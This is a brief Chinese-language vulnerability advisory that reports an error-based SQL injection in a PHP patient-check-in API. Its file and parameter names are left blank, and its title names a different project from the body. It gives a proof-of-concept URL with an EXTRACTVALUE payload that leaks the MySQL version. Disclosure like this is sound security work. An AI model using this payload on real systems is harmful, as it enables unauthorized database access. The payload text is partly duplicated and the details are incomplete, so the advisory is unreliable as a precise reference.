关键信息 Title: SourceCodester User-Management-PHP-MYSQL web v1 SQL Injection Description: - 漏洞存在于开源项目(PQMS)的 文件中。 - 在 文件的第183行, 属性存在SQL注入漏洞。 - 通过在查询字符串中使用XPath语法错误回显机制,可触发MySQL函数 的XPath语法错误,返回版本号等信息。 - 示例POC: Source: http://x.x.x.x:8888/pqms/php/api_patient_checkin.php?appointmentID=WALK202507056%27%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20@@version),0x7e))--%20,0x7e))--%20)